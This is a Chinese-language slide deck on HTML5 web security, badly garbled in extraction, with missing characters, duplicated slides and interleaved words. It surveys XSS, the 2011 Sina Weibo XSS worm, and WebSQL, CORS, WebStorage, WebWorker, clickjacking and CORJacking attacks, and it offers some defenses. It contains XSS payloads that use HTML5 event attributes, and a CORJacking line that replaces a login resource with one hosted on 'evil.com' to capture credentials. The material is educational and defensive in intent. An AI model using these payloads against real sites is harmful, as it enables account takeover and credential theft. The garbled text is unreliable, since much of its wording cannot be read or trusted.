第1页
HTML5 问题
刘
刘
第3页
1
户帐
击(Cross录Si帐te Script户ing) 银恶帐 击 We员b页帐⾯面⾥
里插⼊入恶意html
2 码业 户浏览读该页 篡时
删Web 业 html 码 执
达恶
3 击业户
业 值 资
4 转账
5 发 电 邮 ( iframe frame XMLHttpRequest Flash
击户
执 动 执 发 发 )
6 马
户帐
击(Cross录Si帐te Script户ing) 银恶帐 击 We员b页帐⾯面⾥
里插⼊入恶意html
2 码业 户浏览读该页 篡时
删Web 业 html 码 执
达恶
3 击业户
业 值 资
4 转账
5 发 电 邮 ( iframe frame XMLHttpRequest Flash
击户
执 动 执 发 发 )
6 马
第4页
XSS 击
2011 6 28
现 较 XSS 击
“ 细节”
“业
”
“让⼥女⼈人⼼心动的100 诗 ”
“3D 团团
话”
“这是传说中的神仙眷侣啊”
“惊爆!
艳
经过线
20:14
”
动
为hellosamy 带V 认证 户 转发
户
20:30
页 访问
20:32
hellosamy 户 访问
21:02
补毕
户 动发 诸
2011 6 28
现 较 XSS 击
“ 细节”
“业
”
“让⼥女⼈人⼼心动的100 诗 ”
“3D 团团
话”
“这是传说中的神仙眷侣啊”
“惊爆!
艳
经过线
20:14
”
动
为hellosamy 带V 认证 户 转发
户
20:30
页 访问
20:32
hellosamy 户 访问
21:02
补毕
户 动发 诸
第5页
XSS 击实现
导致的原因是新浪名⼈人堂部分XSS过滤不严所致:
1) 击
执 Ajax 过
单发
2) 这
问题
Ajax
Ajax same domain
执 这 这样 伪 same
domain
执
Ajax
3) 发微博:publish() weibo.com/mblog/publish.php 过Ajax
陆 务 session还在,直接就可以成功发布微博。
4) 发私信:发私信多了⼀一个步骤,获取粉丝的user id
键 getappkey()
weibo.com/YOURID/follow页⾯面扒取所有的user id
过API获取到粉丝
信息,获取之后然后通过⼀一个for loop语句来发送。
导致的原因是新浪名⼈人堂部分XSS过滤不严所致:
1) 击
执 Ajax 过
单发
2) 这
问题
Ajax
Ajax same domain
执 这 这样 伪 same
domain
执
Ajax
3) 发微博:publish() weibo.com/mblog/publish.php 过Ajax
陆 务 session还在,直接就可以成功发布微博。
4) 发私信:发私信多了⼀一个步骤,获取粉丝的user id
键 getappkey()
weibo.com/YOURID/follow页⾯面扒取所有的user id
过API获取到粉丝
信息,获取之后然后通过⼀一个for loop语句来发送。
第6页
标签 击
API 击
WebSQL 击
Web Socket 击
CORS 击
CORJacking
Web Worker 击
Web Storage 击
ClickJacking
CookieJacking
API 击
WebSQL 击
Web Socket 击
CORS 击
CORJacking
Web Worker 击
Web Storage 击
ClickJacking
CookieJacking
第7页
标签 击
•<Audio> <Video> <Canvas> <Article> <Footer> •poster autofocus onerror formaction oninput
!
•<video><sourceonerror sourceonerror="javascript:alert(1)“> •<videoposter videoposter=”javascript:alert(1)”> •<inputautofocusonfocus=“alert(1)”> •<form><buttonformaction buttonformaction="javascript:alert(1)">
•<Audio> <Video> <Canvas> <Article> <Footer> •poster autofocus onerror formaction oninput
!
•<video><sourceonerror sourceonerror="javascript:alert(1)“> •<videoposter videoposter=”javascript:alert(1)”> •<inputautofocusonfocus=“alert(1)”> •<form><buttonformaction buttonformaction="javascript:alert(1)">
第8页
Canvas
Canvas 说 HTML5
签让JavaScript
页
战 传统 户
创 图对
发
<img>标签只是远程加载⼀一个图⽚片,<canvas>标
构图
Canvas 现
Canvas 浏览
戏
过对图
户 验证码
Canvas 说 HTML5
签让JavaScript
页
战 传统 户
创 图对
发
<img>标签只是远程加载⼀一个图⽚片,<canvas>标
构图
Canvas 现
Canvas 浏览
戏
过对图
户 验证码
第9页
WebSQL 击
SQL
库样 击
过SQL
进 库击
XSS 库 纵 XSS
1 获 JavaScript 2 获 SQLite 3获 4
击获 库对 结构
骤
1 检查输⼊入类型,过滤危险字符 2 SQL语句中使⽤用参数形式 3 谨慎对待每⼀一次SQL 4 储 5 绝XSS
SQL
库样 击
过SQL
进 库击
XSS 库 纵 XSS
1 获 JavaScript 2 获 SQLite 3获 4
击获 库对 结构
骤
1 检查输⼊入类型,过滤危险字符 2 SQL语句中使⽤用参数形式 3 谨慎对待每⼀一次SQL 4 储 5 绝XSS
第10页
CORS 击
1 HTTP头只能说明请求来⾃自⼀一个特定的域,但是并不能保证这个
事实。因为HTTP头可以被伪造。 2
3恶
请
经 验证
2对请
说验证
5 针对 户 击
3过
请 应该 验证Session ID Cookie
务仅
须
请 HTTP头、参数等。
1 HTTP头只能说明请求来⾃自⼀一个特定的域,但是并不能保证这个
事实。因为HTTP头可以被伪造。 2
3恶
请
经 验证
2对请
说验证
5 针对 户 击
3过
请 应该 验证Session ID Cookie
务仅
须
请 HTTP头、参数等。
第11页
WebStorage 击
WebStorage简介 HTML5 WebStorage
间 5M
发
为应 创 Cookie
储 储
击 LocalStorage API
历储
户sessionID
过Javascript
这样 击
sessionStorage
应该 临时变
2储
为 们总
问题
储
LocalStorage 长 问题 这
储 为户
LocalStorage 储
过XSS 击
户token 资
户储变
击
变
页
储 WebStorage
WebStorage简介 HTML5 WebStorage
间 5M
发
为应 创 Cookie
储 储
击 LocalStorage API
历储
户sessionID
过Javascript
这样 击
sessionStorage
应该 临时变
2储
为 们总
问题
储
LocalStorage 长 问题 这
储 为户
LocalStorage 储
过XSS 击
户token 资
户储变
击
变
页
储 WebStorage
第12页
WebWorker 击
WebWorker 绍
Javascript 单线 UI 线
线执
浏览 1 对
执执 导 浏览 进
这
户 规 说计
过 浏览 执 Javascript
态 WebWorker 计 过
现 这样 们
时执
JS 务
这 访问 难
2 postMessage时需要验证来源可信;另外不要
使⽤用innerHTML 现 浏览
textContent
postMessage带来的问题
Botnet
对HTML标签进 ⾏ 行W过ebW滤ork,er 或者访问你DO可M 以⾃自过⾏行postMessageAPI 线
postMessage HTML5
线
问
击
编D写Do过s 击滤的发 逻辑邮和函数。 题
messaging
页
户 访问恶 页
时页 恶
击 postMessage 过 务
经过验证 过滤
为
码 户 浏览 WebWorker 规 执
鸡 线击
DDos
XSS 构恶
码 对输
进 验证
data
页 DOM 构 XSS 击
击 “><script></
击发 邮 进 络
script>”
WebWorker 绍
Javascript 单线 UI 线
线执
浏览 1 对
执执 导 浏览 进
这
户 规 说计
过 浏览 执 Javascript
态 WebWorker 计 过
现 这样 们
时执
JS 务
这 访问 难
2 postMessage时需要验证来源可信;另外不要
使⽤用innerHTML 现 浏览
textContent
postMessage带来的问题
Botnet
对HTML标签进 ⾏ 行W过ebW滤ork,er 或者访问你DO可M 以⾃自过⾏行postMessageAPI 线
postMessage HTML5
线
问
击
编D写Do过s 击滤的发 逻辑邮和函数。 题
messaging
页
户 访问恶 页
时页 恶
击 postMessage 过 务
经过验证 过滤
为
码 户 浏览 WebWorker 规 执
鸡 线击
DDos
XSS 构恶
码 对输
进 验证
data
页 DOM 构 XSS 击
击 “><script></
击发 邮 进 络
script>”
第13页
Clickjacking 击
视觉 骗 击击
web 骗户击
iframe
见页 让户
视觉 骗 击击
web 骗户击
iframe
见页 让户
第14页
Cookiejacking Cookie
实现原理其实和ClickJacking Facebook
尝试
骗 户进 应
为 这应
户发 让户图
这实
实现原理其实和ClickJacking Facebook
尝试
骗 户进 应
为 这应
户发 让户图
这实
第15页
CORJacking CORJacking- 资
CORJacking 资 HTML5应⽤用有各种不同的资源,例如Flash
过DOM访问和控制。如果页⾯面存在XSS
击 过资 进
为户录 这
们 实现
逻辑
Silverligh 视频 频 击 码载
这资 swf
页 XSS 时 击
swf 换为 诈 资
document.getElementByName(‘Login’).item(0).src=‘http://evil.com/login.swf’;
户 这样 录 输
户 码 录时 帐 经
CORJacking 资 HTML5应⽤用有各种不同的资源,例如Flash
过DOM访问和控制。如果页⾯面存在XSS
击 过资 进
为户录 这
们 实现
逻辑
Silverligh 视频 频 击 码载
这资 swf
页 XSS 时 击
swf 换为 诈 资
document.getElementByName(‘Login’).item(0).src=‘http://evil.com/login.swf’;
户 这样 录 输
户 码 录时 帐 经
第16页
Attack API, BeEF,
!
Shell of the Future
话
!
Ravan
JS
线执
XSS-Proxy XSS 击
浏览
WebShell处理器,它利⽤用HTML5
请
计统 击
HTML5Web Worker 过
JS
!
Shell of the Future
话
!
Ravan
JS
线执
XSS-Proxy XSS 击
浏览
WebShell处理器,它利⽤用HTML5
请
计统 击
HTML5Web Worker 过
JS
第17页
谢谢!